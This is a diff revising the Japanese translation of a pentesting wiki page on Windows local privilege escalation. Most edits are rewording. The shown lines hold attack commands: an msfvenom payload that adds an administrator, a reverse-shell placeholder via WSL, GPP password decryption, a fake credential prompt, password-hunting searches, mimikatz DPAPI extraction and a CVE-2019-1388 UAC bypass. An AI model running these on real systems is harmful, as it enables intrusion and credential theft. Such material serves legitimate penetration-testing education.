@@ -545,15 +545,15 @@ gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Whe
 ```bash
 msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
 ```
-### 回復アクション
+### Recovery Actions
 
-Windowsは、サービスが失敗した場合に実行されるアクションをユーザーが指定できるようにしています。この機能はバイナリを指すように設定できます。このバイナリが置き換え可能であれば、特権昇格が可能かもしれません。詳細は[公式ドキュメント](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753662(v=ws.11)?redirectedfrom=MSDN>)を参照してください。
+Windowsは、サービスが失敗した場合に実行されるアクションをユーザーが指定できるようにしています。この機能は、バイナリを指すように構成できます。このバイナリが置き換え可能であれば、特権昇格が可能かもしれません。詳細は[公式ドキュメント](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753662(v=ws.11)?redirectedfrom=MSDN>)を参照してください。
 
-## アプリケーション
+## Applications
 
-### インストールされたアプリケーション
+### Installed Applications
 
-**バイナリの権限**（上書きして特権を昇格できるかもしれません）と**フォルダー**の権限を確認してください（[DLL Hijacking](dll-hijacking/)）。
+**バイナリの権限**を確認してください（もしかしたら、1つを上書きして特権を昇格できるかもしれません）および**フォルダー**の権限（[DLL Hijacking](dll-hijacking/)）。
 ```bash
 dir /a "C:\Program Files"
 dir /a "C:\Program Files (x86)"
@@ -566,7 +566,7 @@ Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
 
 特定のファイルを読み取るために設定ファイルを変更できるか、または管理者アカウント（schedtasks）によって実行されるバイナリを変更できるかを確認してください。
 
-システム内の弱いフォルダー/ファイルの権限を見つける方法は次のとおりです:
+システム内の弱いフォルダー/ファイルの権限を見つける方法は次のとおりです：
 ```bash
 accesschk.exe /accepteula
 # Find all weak folder permissions per drive.
@@ -608,7 +608,7 @@ driverquery /SI
 ```
 ## PATH DLL ハイジャック
 
-**PATHに存在するフォルダー内に書き込み権限がある場合**、プロセスによって読み込まれるDLLをハイジャックし、**権限を昇格させる**ことができるかもしれません。
+**PATHに存在するフォルダー内に書き込み権限がある場合**、プロセスによってロードされたDLLをハイジャックし、**権限を昇格させる**ことができるかもしれません。
 
 PATH内のすべてのフォルダーの権限を確認してください:
 ```bash
@@ -662,7 +662,7 @@ Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L
 
 [**ファイアウォール関連のコマンドについてはこのページを確認してください**](../basic-cmd-for-pentesters.md#firewall) **(ルールのリスト、ルールの作成、オフにする、オフにする...)**
 
-さらに[ネットワーク列挙のためのコマンドはこちら](../basic-cmd-for-pentesters.md#network)
+ネットワーク列挙のためのさらに多くの[コマンドはこちら](../basic-cmd-for-pentesters.md#network)
 
 ### Windows Subsystem for Linux (wsl)
 ```bash
@@ -671,14 +671,14 @@ C:\Windows\System32\wsl.exe
 ```
 バイナリ `bash.exe` は `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe` にも見つけることができます。
 
-ルートユーザーを取得すると、任意のポートでリッスンできます（`nc.exe` を使用してポートでリッスンする最初の時に、GUIを通じて `nc` がファイアウォールによって許可されるべきかどうか尋ねられます）。
+ルートユーザーを取得すると、任意のポートでリッスンできます（最初に `nc.exe` を使用してポートでリッスンすると、GUIを介して `nc` がファイアウォールによって許可されるべきかどうかを尋ねられます）。
 ```bash
 wsl whoami
 ./ubuntun1604.exe config --default-user root
 wsl whoami
 wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
 ```
-bashをルートとして簡単に開始するには、`--default-user root`を試すことができます。
+bashをrootとして簡単に起動するには、`--default-user root`を試すことができます。
 
 `WSL`ファイルシステムは、フォルダー`C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\`で探索できます。
 
@@ -699,9 +699,9 @@ reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDef
 ### Credentials manager / Windows vault
 
 From [https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault](https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault)\
-Windows Vaultは、**Windows**が**ユーザーを自動的にログインさせることができる**サーバー、ウェブサイト、その他のプログラムのユーザー資格情報を保存します。一見すると、ユーザーがFacebookの資格情報、Twitterの資格情報、Gmailの資格情報などを保存できるように見え、ブラウザを通じて自動的にログインできるようになります。しかし、そうではありません。
+Windows Vaultは、**Windows**が**ユーザーを自動的にログイン**させるためのサーバー、ウェブサイト、その他のプログラムのユーザー資格情報を保存します。最初は、ユーザーがFacebookの資格情報、Twitterの資格情報、Gmailの資格情報などを保存できるようになり、ブラウザを通じて自動的にログインできるように見えるかもしれません。しかし、そうではありません。
 
-Windows Vaultは、Windowsがユーザーを自動的にログインさせることができる資格情報を保存します。つまり、**リソース**（サーバーまたはウェブサイト）にアクセスするために資格情報を必要とする**Windowsアプリケーションは、このCredential Manager** & Windows Vaultを利用し、ユーザーが常にユーザー名とパスワードを入力する代わりに提供された資格情報を使用できます。
+Windows Vaultは、Windowsがユーザーを自動的にログインさせることができる資格情報を保存します。つまり、リソース（サーバーまたはウェブサイト）にアクセスするために資格情報が必要な**Windowsアプリケーションは、このCredential Manager** & Windows Vaultを利用し、ユーザーが常にユーザー名とパスワードを入力する代わりに提供された資格情報を使用できます。
 
 アプリケーションがCredential Managerと相互作用しない限り、特定のリソースの資格情報を使用することは不可能だと思います。したがって、アプリケーションがボールトを利用したい場合は、何らかの方法で**資格情報マネージャーと通信し、そのリソースの資格情報をデフォルトのストレージボールトから要求する必要があります**。
 
@@ -729,12 +729,12 @@ C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\us
 
 **DPAPIは、ユーザーのログイン秘密から導出された対称鍵を通じて鍵の暗号化を可能にします**。システム暗号化が関与するシナリオでは、システムのドメイン認証秘密を利用します。
 
-DPAPIを使用して暗号化されたユーザーRSA鍵は、`%APPDATA%\Microsoft\Protect\{SID}`ディレクトリに保存され、ここで`{SID}`はユーザーの[セキュリティ識別子](https://en.wikipedia.org/wiki/Security_Identifier)を表します。**DPAPIキーは、ユーザーの秘密鍵を同じファイル内で保護するマスターキーと共に配置されており**、通常は64バイトのランダムデータで構成されています。（このディレクトリへのアクセスは制限されており、CMDの`dir`コマンドを使用してその内容をリストすることはできませんが、PowerShellを通じてリストすることは可能です）。
+DPAPIを使用して暗号化されたユーザーRSA鍵は、`%APPDATA%\Microsoft\Protect\{SID}`ディレクトリに保存され、ここで`{SID}`はユーザーの[セキュリティ識別子](https://en.wikipedia.org/wiki/Security_Identifier)を表します。**DPAPIキーは、ユーザーの秘密鍵を保護するマスターキーと同じファイルに共存しており**、通常は64バイトのランダムデータで構成されています。（このディレクトリへのアクセスは制限されており、CMDの`dir`コマンドでその内容をリストすることはできませんが、PowerShellを通じてリストすることは可能です）。
 ```powershell
 Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
 Get-ChildItem  C:\Users\USER\AppData\Local\Microsoft\Protect\
 ```
-**mimikatzモジュール** `dpapi::masterkey` を適切な引数（`/pvk` または `/rpc`）と共に使用して、それを復号化できます。
+**mimikatz モジュール** `dpapi::masterkey` を適切な引数（`/pvk` または `/rpc`）で使用して、それを復号化できます。
 
 **マスターパスワードによって保護された資格情報ファイル** は通常、次の場所にあります:
 ```powershell
@@ -744,7 +744,7 @@ Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
 Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
 ```
 **mimikatzモジュール** `dpapi::cred` を適切な `/masterkey` と共に使用して復号化できます。\
-**メモリ** から **多くのDPAPI** **マスタキー** を `sekurlsa::dpapi` モジュールを使って抽出できます（ルート権限が必要です）。
+**メモリ** から **多くのDPAPI** **マスタキー** を `sekurlsa::dpapi` モジュールを使用して抽出できます（あなたがルートである場合）。
 
 {{#ref}}
 dpapi-extracting-passwords.md
@@ -752,7 +752,7 @@ dpapi-extracting-passwords.md
 
 ### PowerShell資格情報
 
-**PowerShell資格情報** は、スクリプトや自動化タスクのために暗号化された資格情報を便利に保存する方法としてよく使用されます。資格情報は **DPAPI** を使用して保護されており、通常、作成された同じコンピュータ上の同じユーザーによってのみ復号化できます。
+**PowerShell資格情報** は、スクリプト作成や自動化タスクのために、暗号化された資格情報を便利に保存する方法としてよく使用されます。資格情報は **DPAPI** を使用して保護されており、通常、作成された同じコンピュータ上の同じユーザーによってのみ復号化できます。
 
 ファイルからPS資格情報を**復号化**するには、次のようにします：
 ```powershell
@@ -789,7 +789,7 @@ HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
 %localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
 ```
 **Mimikatz** `dpapi::rdg` モジュールを適切な `/masterkey` と共に使用して **任意の .rdg ファイルを復号化**します。\
-メモリから多くの DPAPI マスタキーを **Mimikatz** `sekurlsa::dpapi` モジュールで **抽出**できます。
+メモリから多くの DPAPI マスタキーを **Mimikatz** `sekurlsa::dpapi` モジュールを使用して **抽出**できます。
 
 ### Sticky Notes
 
@@ -882,7 +882,7 @@ $ErrorActionPreference = $OrigError
 ### SCClient / SCCM
 
 `C:\Windows\CCM\SCClient.exe` が存在するか確認します。\
-インストーラーは **SYSTEM 権限で実行され**、多くは **DLL サイドローディングに脆弱です（情報元は** [**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**）。**
+インストーラーは **SYSTEM 権限で実行され**、多くは **DLL サイドローディングに脆弱です（情報は** [**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**）。**
 ```bash
 $result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
 if ($result) { $result }
@@ -929,9 +929,9 @@ C:\unattend.txt
 C:\unattend.inf
 dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
 ```
-これらのファイルは**metasploit**を使用しても検索できます: _post/windows/gather/enum_unattend_
+これらのファイルは、**metasploit**を使用しても検索できます: _post/windows/gather/enum_unattend_
 
-Example content:
+例の内容:
 ```xml
 <component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
 <AutoLogon>
@@ -976,11 +976,11 @@ AppData\Roaming\gcloud\access_tokens.db
 
 ### Cached GPP Pasword
 
-以前は、グループポリシープリファレンス（GPP）を介して一群のマシンにカスタムローカル管理者アカウントを展開する機能がありました。しかし、この方法には重大なセキュリティ上の欠陥がありました。まず、SYSVOLにXMLファイルとして保存されているグループポリシーオブジェクト（GPO）は、任意のドメインユーザーによってアクセス可能でした。次に、公開文書化されたデフォルトキーを使用してAES256で暗号化されたこれらのGPP内のパスワードは、認証されたユーザーによって復号化可能でした。これは、ユーザーが特権を昇格させる可能性があるため、深刻なリスクをもたらしました。
+以前は、グループポリシーの設定（GPP）を介して一群のマシンにカスタムローカル管理者アカウントを展開する機能がありました。しかし、この方法には重大なセキュリティ上の欠陥がありました。まず、SYSVOLにXMLファイルとして保存されているグループポリシーオブジェクト（GPO）は、任意のドメインユーザーによってアクセス可能でした。次に、公開文書化されたデフォルトキーを使用してAES256で暗号化されたこれらのGPP内のパスワードは、認証されたユーザーによって復号化可能でした。これは、ユーザーが特権を昇格させることを可能にするため、深刻なリスクをもたらしました。
 
 このリスクを軽減するために、「cpassword」フィールドが空でないローカルキャッシュされたGPPファイルをスキャンする機能が開発されました。このようなファイルが見つかると、関数はパスワードを復号化し、カスタムPowerShellオブジェクトを返します。このオブジェクトには、GPPに関する詳細とファイルの場所が含まれており、このセキュリティ脆弱性の特定と修正に役立ちます。
 
-`C:\ProgramData\Microsoft\Group Policy\history` または _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history**（W Vista以前）_ でこれらのファイルを探します：
+これらのファイルを探すには、`C:\ProgramData\Microsoft\Group Policy\history`または_**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history**（W Vista以前）_を参照してください：
 
 - Groups.xml
 - Services.xml
@@ -994,7 +994,7 @@ AppData\Roaming\gcloud\access_tokens.db
 #To decrypt these passwords you can decrypt it using
 gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
 ```
-crackmapexecを使用してパスワードを取得する:
+crackmapexecを使用してパスワードを取得する：
 ```bash
 crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin
 ```
@@ -1052,7 +1052,7 @@ Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAct
 ```
 ### 認証情報を要求する
 
-ユーザーに自分の認証情報や別のユーザーの認証情報を入力するように**常に要求することができます**。彼がそれらを知っていると思われる場合（**クライアントに直接**認証情報を**要求することは非常に**リスクが高いことに注意してください）：
+ユーザーに自分の認証情報や別のユーザーの認証情報を入力するように**常に要求することができます**。彼がそれらを知っていると思われる場合（**クライアントに直接**認証情報を**要求することは本当に**リスクが高いことに注意してください）：
 ```bash
 $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
 $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password
@@ -1154,7 +1154,7 @@ reg query "HKCU\Software\OpenSSH\Agent\Key"
 
 ### ブラウザの履歴
 
-**ChromeまたはFirefox**からパスワードが保存されているdbを確認する必要があります。\
+**ChromeやFirefox**からパスワードが保存されているdbを確認する必要があります。\
 また、ブラウザの履歴、ブックマーク、お気に入りも確認してください。そこに**パスワードが**保存されているかもしれません。
 
 ブラウザからパスワードを抽出するためのツール：
@@ -1170,7 +1170,7 @@ reg query "HKCU\Software\OpenSSH\Agent\Key"
 
 COMクラスとインターフェースは、それぞれ**HKEY\_**_**CLASSES\_**_**ROOT\CLSID**および**HKEY\_**_**CLASSES\_**_**ROOT\Interface**のレジストリに定義されています。このレジストリは、**HKEY\_**_**LOCAL\_**_**MACHINE\Software\Classes** + **HKEY\_**_**CURRENT\_**_**USER\Software\Classes** = **HKEY\_**_**CLASSES\_**_**ROOT**をマージすることによって作成されます。
 
-このレジストリのCLSID内には、**InProcServer32**という子レジストリがあり、**DLL**を指す**デフォルト値**と、**Apartment**（シングルスレッド）、**Free**（マルチスレッド）、**Both**（シングルまたはマルチ）、または**Neutral**（スレッド中立）という値を持つ**ThreadingModel**があります。
+このレジストリのCLSID内には、**DLL**を指す**デフォルト値**を含む子レジストリ**InProcServer32**があり、**ThreadingModel**という値があり、これは**Apartment**（シングルスレッド）、**Free**（マルチスレッド）、**Both**（シングルまたはマルチ）、または**Neutral**（スレッド中立）である可能性があります。
 
 ![](<../../images/image (729).png>)
 
@@ -1184,13 +1184,13 @@ com-hijacking.md
 
 ### **ファイルとレジストリ内の一般的なパスワード検索**
 
-**ファイル内容を検索**
+**ファイルの内容を検索**
 ```bash
 cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
 findstr /si password *.xml *.ini *.txt *.config
 findstr /spin "password" *.*
 ```
-**特定のファイル名のファイルを検索する**
+**特定のファイル名を持つファイルを検索する**
 ```bash
 dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
 where /R C:\ user.txt
@@ -1205,11 +1205,11 @@ REG QUERY HKCU /F "password" /t REG_SZ /S /d
 ```
 ### パスワードを検索するツール
 
-[**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **はmsfの** プラグインで、**被害者の中で資格情報を検索するすべてのmetasploit POSTモジュールを自動的に実行するために作成しました**。\
+[**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **はmsfの** プラグインで、**被害者の内部で資格情報を検索するすべてのmetasploit POSTモジュールを自動的に実行するために作成しました。**\
 [**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) は、このページに記載されているパスワードを含むすべてのファイルを自動的に検索します。\
 [**Lazagne**](https://github.com/AlessandroZ/LaZagne) は、システムからパスワードを抽出するためのもう一つの優れたツールです。
 
-ツール [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) は、**セッション**、**ユーザー名**、および**パスワード**を検索します。これらは、クリアテキストでデータを保存するいくつかのツール（PuTTY、WinSCP、FileZilla、SuperPuTTY、RDP）によって保存されます。
+ツール[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) は、**セッション**、**ユーザー名**、および**パスワード**を検索します。これらは、クリアテキストでデータを保存するいくつかのツール（PuTTY、WinSCP、FileZilla、SuperPuTTY、RDP）によって保存されます。
 ```bash
 Import-Module path\to\SessionGopher.ps1;
 Invoke-SessionGopher -Thorough
@@ -1220,16 +1220,16 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
 
 **SYSTEMとして実行されているプロセスが新しいプロセスを開く** (`OpenProcess()`) **フルアクセスで**。同じプロセスが**低特権で新しいプロセスを作成する** (`CreateProcess()`) **が、メインプロセスのすべてのオープンハンドルを継承する**。\
 その後、**低特権プロセスにフルアクセスがある場合**、`OpenProcess()`で作成された**特権プロセスへのオープンハンドルを取得し**、**シェルコードを注入**できます。\
-[この例を読んで、**この脆弱性を検出し、悪用する方法についての詳細情報を得てください**。](leaked-handle-exploitation.md)\
-[この**別の投稿を読んで、異なる権限レベル（フルアクセスだけでなく）で継承されたプロセスとスレッドのオープンハンドルをテストし、悪用する方法についてのより完全な説明を得てください**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)。
+[この例を読んで、**この脆弱性を検出し、悪用する方法についての詳細を確認してください**。](leaked-handle-exploitation.md)\
+[この**別の投稿を読んで、異なる権限レベル（フルアクセスだけでなく）で継承されたプロセスとスレッドのオープンハンドルをテストし、悪用する方法についてのより完全な説明を確認してください**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)。
 
-## 名前付きパイプクライアントの偽装
+## 名前付きパイプクライアントのなりすまし
 
 共有メモリセグメント、すなわち**パイプ**は、プロセス間の通信とデータ転送を可能にします。
 
-Windowsは**名前付きパイプ**という機能を提供しており、無関係なプロセスが異なるネットワークを介してデータを共有できます。これは、**名前付きパイプサーバー**と**名前付きパイプクライアント**として定義された役割を持つクライアント/サーバーアーキテクチャに似ています。
+Windowsは**名前付きパイプ**という機能を提供しており、無関係なプロセスが異なるネットワークを介してもデータを共有できます。これは、**名前付きパイプサーバー**と**名前付きパイプクライアント**として定義された役割を持つクライアント/サーバーアーキテクチャに似ています。
 
-**クライアント**によってパイプを通じてデータが送信されると、パイプを設定した**サーバー**は**クライアントのアイデンティティを引き受ける**能力を持ちます。必要な**SeImpersonate**権限を持っている場合です。パイプを介して通信する**特権プロセス**を特定し、そのプロセスのアイデンティティを模倣する機会があり、あなたが確立したパイプと相互作用する際にそのプロセスのアイデンティティを採用することで**より高い特権を得る**ことができます。このような攻撃を実行するための指示は、[**こちら**](named-pipe-client-impersonation.md)および[**こちら**](./#from-high-integrity-to-system)で見つけることができます。
+**クライアント**によってパイプを通じてデータが送信されると、パイプを設定した**サーバー**は**クライアントのアイデンティティを引き受ける**能力を持ちます。必要な**SeImpersonate**権限がある場合です。パイプを介して通信する**特権プロセス**を特定し、そのプロセスのアイデンティティを模倣する機会があり、あなたが確立したパイプと相互作用する際にそのプロセスのアイデンティティを採用することで**より高い特権を得る**ことができます。このような攻撃を実行するための指示は、[**こちら**](named-pipe-client-impersonation.md)および[**こちら**](./#from-high-integrity-to-system)で見つけることができます。
 
 また、次のツールは**burpのようなツールで名前付きパイプ通信を傍受する**ことを可能にします：[**https://github.com/gabriel-sztejnworcel/pipe-intercept**](https://github.com/gabriel-sztejnworcel/pipe-intercept) **このツールは、特権昇格を見つけるためにすべてのパイプをリストし、表示することを可能にします** [**https://github.com/cyberark/PipeViewer**](https://github.com/cyberark/PipeViewer)
 
@@ -1249,11 +1249,11 @@ Compare-Object -ReferenceObject $process -DifferenceObject $process2
 ```
 ## プロセスからのパスワードの盗難
 
-## 低特権ユーザーから NT\AUTHORITY SYSTEM への昇格 (CVE-2019-1388) / UAC バイパス
+## 低特権ユーザーから NT\AUTHORITY SYSTEM へ (CVE-2019-1388) / UAC バイパス
 
 グラフィカルインターフェース（コンソールまたは RDP 経由）にアクセスでき、UAC が有効になっている場合、Microsoft Windows の一部のバージョンでは、特権のないユーザーから「NT\AUTHORITY SYSTEM」などのターミナルや他のプロセスを実行することが可能です。
 
-これにより、特権を昇格させ、同時に同じ脆弱性で UAC をバイパスすることができます。さらに、何もインストールする必要がなく、プロセス中に使用されるバイナリは Microsoft によって署名され、発行されています。
+これにより、特権を昇格させ、同じ脆弱性を使用して同時に UAC をバイパスすることができます。さらに、何かをインストールする必要はなく、プロセス中に使用されるバイナリは Microsoft によって署名され、発行されています。
 
 影響を受けるシステムの一部は以下の通りです：
 ```
@@ -1295,11 +1295,11 @@ Windows 10 1709	16299	link NOT opened
 
 8) Remember to cancel setup and the UAC prompt to return to your desktop.
 ```
-あなたは次のGitHubリポジトリに必要なすべてのファイルと情報を持っています：
+あなたは以下のGitHubリポジトリに必要なファイルと情報をすべて持っています：
 
 https://github.com/jas502n/CVE-2019-1388
 
-## 管理者の中程度から高い整合性レベル / UACバイパスへ
+## 管理者の中程度から高い整合性レベル / UACバイパス
 
 **整合性レベルについて学ぶには、これを読んでください：**
 
@@ -1327,65 +1327,65 @@ sc start newservicename
 高い整合性プロセスから、**AlwaysInstallElevatedレジストリエントリを有効にし**、_**.msi**_ラッパーを使用してリバースシェルを**インストール**しようとすることができます。\
 [関与するレジストリキーと_.msi_パッケージのインストール方法についての詳細はこちら。](./#alwaysinstallelevated)
 
-### High + SeImpersonate特権からSystemへ
+### High + SeImpersonate privilege to System
 
-**コードを** [**こちらで見つけることができます**](seimpersonate-from-high-to-system.md)**。**
+**コードは** [**こちらで見つけることができます**](seimpersonate-from-high-to-system.md)**。**
 
-### SeDebug + SeImpersonateからフルトークン特権へ
+### From SeDebug + SeImpersonate to Full Token privileges
 
-これらのトークン特権を持っている場合（おそらくすでに高い整合性プロセスで見つけるでしょう）、**ほぼすべてのプロセス**（保護されたプロセスではない）をSeDebug特権で**開くことができ**、プロセスの**トークンをコピー**し、そのトークンを使用して**任意のプロセスを作成**することができます。\
-この技術を使用する際は、通常、**すべてのトークン特権を持つSYSTEMとして実行されている任意のプロセスを選択します**（_はい、すべてのトークン特権を持たないSYSTEMプロセスを見つけることができます_）。\
-**提案された技術を実行するコードの** [**例をこちらで見つけることができます**](sedebug-+-seimpersonate-copy-token.md)**。**
+これらのトークン権限を持っている場合（おそらくすでに高い整合性プロセスで見つけるでしょう）、**ほぼすべてのプロセス**（保護されたプロセスではない）をSeDebug権限で**開くことができ**、プロセスの**トークンをコピー**し、そのトークンを使用して**任意のプロセスを作成**することができます。\
+この技術を使用する際は、通常、**すべてのトークン権限を持つSYSTEMとして実行されている任意のプロセスを選択します**（_はい、すべてのトークン権限を持たないSYSTEMプロセスを見つけることができます_）。\
+**提案された技術を実行するコードの** [**例はこちらで見つけることができます**](sedebug-+-seimpersonate-copy-token.md)**。**
 
 ### **Named Pipes**
 
-この技術は、meterpreterが`getsystem`で昇格するために使用されます。この技術は、**パイプを作成し、そのパイプに書き込むサービスを作成/悪用する**ことから成ります。次に、**`SeImpersonate`**特権を使用してパイプを作成した**サーバー**は、パイプクライアント（サービス）の**トークンを偽装**し、SYSTEM特権を取得することができます。\
+この技術は、meterpreterが`getsystem`で昇格するために使用されます。この技術は、**パイプを作成し、そのパイプに書き込むサービスを作成/悪用する**ことから成ります。次に、**`SeImpersonate`**権限を使用してパイプを作成した**サーバー**は、パイプクライアント（サービス）の**トークンを偽装**し、SYSTEM権限を取得することができます。\
 名前付きパイプについて[**もっと学びたい場合はこれを読むべきです**](./#named-pipe-client-impersonation)。\
 高い整合性からSYSTEMに名前付きパイプを使用して移行する[**方法の例を読みたい場合はこれを読むべきです**](from-high-integrity-to-system-with-name-pipes.md)。
 
 ### Dll Hijacking
 
-**SYSTEM**として実行されている**プロセス**によって**ロードされるdllをハイジャック**することができれば、その権限で任意のコードを実行することができます。したがって、Dll Hijackingはこの種の特権昇格にも役立ち、さらに、高い整合性プロセスからは**はるかに簡単に達成できます**。なぜなら、dllをロードするために使用されるフォルダーに**書き込み権限**を持っているからです。\
+**SYSTEM**として実行されている**プロセス**によって**ロードされるdllをハイジャック**することができれば、その権限で任意のコードを実行することができます。したがって、Dll Hijackingはこの種の権限昇格にも役立ち、さらに、高い整合性プロセスからは**はるかに簡単に達成できます**。なぜなら、dllをロードするために使用されるフォルダーに**書き込み権限**を持っているからです。\
 **Dllハイジャックについて** [**こちらで詳しく学ぶことができます**](dll-hijacking/)**。**
 
-### **AdministratorまたはNetwork ServiceからSystemへ**
+### **From Administrator or Network Service to System**
 
 {% embed url="https://github.com/sailay1996/RpcSsImpersonator" %}
 
-### LOCAL SERVICEまたはNETWORK SERVICEからフル特権へ
+### From LOCAL SERVICE or NETWORK SERVICE to full privs
 
 **読む:** [**https://github.com/itm4n/FullPowers**](https://github.com/itm4n/FullPowers)
 
-## さらなるヘルプ
+## More help
 
 [Static impacket binaries](https://github.com/ropnop/impacket_static_binaries)
 
-## 有用なツール
+## Useful tools
 
-**Windowsローカル特権昇格ベクトルを探すための最良のツール:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
+**Windowsローカル権限昇格ベクトルを探すための最良のツール:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
 
 **PS**
 
 [**PrivescCheck**](https://github.com/itm4n/PrivescCheck)\
-[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) **-- 設定ミスや機密ファイルをチェックします (**[**こちらを確認**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**)。検出されました。**\
-[**JAWS**](https://github.com/411Hall/JAWS) **-- 一部の設定ミスをチェックし、情報を収集します (**[**こちらを確認**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**)。**\
-[**privesc** ](https://github.com/enjoiz/Privesc)**-- 設定ミスをチェックします**\
+[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) **-- 誤設定や機密ファイルをチェックします (**[**こちらを確認**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**)。検出されました。**\
+[**JAWS**](https://github.com/411Hall/JAWS) **-- 一部の可能な誤設定をチェックし、情報を収集します (**[**こちらを確認**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**)。**\
+[**privesc** ](https://github.com/enjoiz/Privesc)**-- 誤設定をチェックします**\
 [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) **-- PuTTY、WinSCP、SuperPuTTY、FileZilla、RDPの保存されたセッション情報を抽出します。ローカルで-Thoroughを使用します。**\
 [**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) **-- Credential Managerから資格情報を抽出します。検出されました。**\
 [**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) **-- 収集したパスワードをドメイン全体にスプレーします**\
 [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **-- InveighはPowerShellのADIDNS/LLMNR/mDNS/NBNSスプーフィングおよび中間者攻撃ツールです。**\
-[**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) **-- 基本的な特権昇格のWindows列挙**\
-[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock) **\~\~**\~\~ -- 既知の特権昇格の脆弱性を検索します（Watsonのために非推奨）\
+[**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) **-- 基本的な権限昇格Windows列挙**\
+[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock) **\~\~**\~\~ -- 既知の権限昇格脆弱性を検索します（非推奨）\
 [~~**WINspect**~~](https://github.com/A-mIn3/WINspect) -- ローカルチェック **(管理者権限が必要)**
 
 **Exe**
 
-[**Watson**](https://github.com/rasta-mouse/Watson) -- 既知の特権昇格の脆弱性を検索します（VisualStudioを使用してコンパイルする必要があります） ([**事前コンパイル済み**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\
-[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- 設定ミスを探すためにホストを列挙します（特権昇格よりも情報収集ツールです）（コンパイルが必要） **(**[**事前コンパイル済み**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\
+[**Watson**](https://github.com/rasta-mouse/Watson) -- 既知の権限昇格脆弱性を検索します（VisualStudioを使用してコンパイルする必要があります） ([**事前コンパイル済み**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\
+[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- 誤設定を探してホストを列挙します（権限昇格よりも情報収集ツールです）（コンパイルが必要） **(**[**事前コンパイル済み**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\
 [**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- 多くのソフトウェアから資格情報を抽出します（GitHubに事前コンパイル済みexeあり）**\
-[**SharpUP**](https://github.com/GhostPack/SharpUp) **-- PowerUpのC#へのポート**\
